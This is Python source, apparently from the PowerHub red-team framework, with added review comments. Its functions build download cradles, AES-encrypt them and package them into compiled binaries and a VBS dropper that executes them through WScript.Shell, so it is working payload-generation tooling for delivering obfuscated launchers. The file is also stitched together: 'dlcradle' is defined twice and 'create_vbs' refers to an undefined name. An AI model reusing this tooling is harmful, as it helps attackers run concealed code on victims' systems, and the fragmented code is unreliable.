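def compile_source(args, source_file, compile_cmd, formatter):
    """Render a source template around an encrypted cradle and compile it.

    Args:
        args: Request parameters. They are copied into a plain dict and the
            'Launcher' entry is forced to 'cmd_enc' before the cradle is built.
        source_file: Template name handed to ``load_template``.
        compile_cmd: Callable that takes the output path and returns the
            compiler command as an argument list.
        formatter: Callable that turns the encrypted bytes into the text
            substituted for ``CMD`` in the template.

    Returns:
        A ``(filename, result)`` tuple: the name from ``create_filename`` and
        the bytes of the compiled output file.

    Raises:
        RuntimeError: If the compiler exits with a non-zero status.
    """
    filename = create_filename(args)
    args = dict(args)  # convert from immutable dict
    args['Launcher'] = 'cmd_enc'
    cmd = build_cradle(args)
    # LEN_CMD is the length of the cradle string, measured before encryption.
    size = len(cmd)
    key = generate_random_key(16)
    cmd = encrypt_aes(cmd.encode(), key)
    c_code = load_template(
        source_file,
        CMD=formatter(cmd),
        LEN_CMD=size,
        KEY=key,
    )

    # The directory, the rendered source and the binary are removed when the
    # block exits, so the output is read while still inside it.
    with tempfile.TemporaryDirectory() as tmpdirname:
        outfile = os.path.join(tmpdirname, 'powerhub.out')
        infile = os.path.join(tmpdirname, 'powerhub.in')
        with open(infile, 'w') as f:
            f.write(c_code)

        # Argument list, no shell: the paths are never parsed as shell syntax.
        pipe = subprocess.Popen(
            compile_cmd(outfile) + [infile],
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
        )
        # Only stdout is captured; stderr still goes to the console.
        stdout, _ = pipe.communicate()

        if pipe.returncode != 0:
            # Log before raising. The original logged after the raise, so the
            # call was unreachable, and it concatenated a str with the tuple
            # returned by communicate(), which would have been a TypeError.
            log.error(
                'Compiling the payload failed: %s',
                stdout.decode(errors='replace'),
            )
            raise RuntimeError('Compiling the payload failed, '
                               'see console output')

        with open(outfile, 'rb') as f:
            result = f.read()

    return filename, result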
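def dlcradle():
    """Render the download-cradle page for the launcher named in the query.

    For the text launchers listed below the cradle is built and passed to the
    template as ``dl_str``. For any other launcher the template gets
    ``dl_str=None`` and an ``href`` pointing at ``/dl`` with the same query
    parameters.

    Returns:
        The rendered template, or ``(message, 500)`` when a required query
        parameter is missing.
    """
    # Launchers whose cradle is handed to the template as text.
    text_launchers = ('powershell', 'cmd', 'cmd_enc', 'bash')
    try:
        if request.args['Launcher'] in text_launchers:
            cmd = build_cradle(request.args)
            return render_template(
                "hub/download-cradle.html",
                dl_str=cmd,
            )

        # A bare `import urllib` does not guarantee that the `parse`
        # submodule is loaded; import it explicitly.
        import urllib.parse

        # urlencode percent-encodes the client-supplied parameters before
        # they are placed in the link.
        href = urllib.parse.urlencode(request.args)
        return render_template(
            "hub/download-cradle.html",
            dl_str=None,
            href='/dl?' + href,
        )
    except BadRequestKeyError as e:
        log.error("Unknown key, must be one of %s" %
                  str(list(request.args.keys())))
        # NOTE(review): a missing parameter is a client error, so 400 would be
        # the conventional status; 500 is kept so existing callers see no
        # change.
        return (str(e), 500)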
def create_vbs(args):
    """Fill the 'powerhub.vbs' template with an encrypted cradle command.

    The cradle is built with 'Launcher' forced to 'cmd_enc', has its newlines
    stripped, is wrapped in a WScript.Shell ``exec`` call and is encrypted
    with a freshly generated key. Ciphertext and key are passed to the
    template as space-separated upper-case hex bytes.

    Args:
        args: Request parameters (an immutable mapping; a copy is modified).

    Returns:
        A ``(filename, vbs_code)`` tuple.
    """
    filename = create_filename(args)

    # Work on a mutable copy; the incoming mapping is immutable.
    params = dict(args)
    params['Launcher'] = 'cmd_enc'

    one_line_cradle = build_cradle(params).replace('\n', '')
    vbs_call = 'CreateObject("WScript.Shell").exec("%s")' % one_line_cradle

    # The key is iterated with ord() below, so it is handled as a str here.
    key = generate_random_key(16)
    ciphertext = encrypt_aes(vbs_call.encode(), key)

    hex_code = ' '.join(['%02X' % byte for byte in ciphertext])
    hex_key = ' '.join(['%02X' % ord(char) for char in key])

    # `symbol_name` is not defined in this function; it is resolved from the
    # enclosing scope.
    vbs_code = load_template(
        'powerhub.vbs',
        HEX_CODE=hex_code,
        HEX_KEY=hex_key,
        symbol_name=symbol_name,
    )
    return filename, vbs_code
def dlcradle():
    """Return the cradle built from the query string for the given flavor.

    Returns:
        The result of ``build_cradle``, or ``(message, 500)`` when a required
        query parameter (such as ``flavor``) is missing.
    """
    params = request.args
    try:
        flavor = params["flavor"]
        # build_cradle stays inside the try: a key it looks up may be missing
        # as well.
        return build_cradle(params, flavor=flavor)
    except BadRequestKeyError as err:
        message = "Unknown key, must be one of %s" % str(params)
        log.error(message)
        return str(err), 500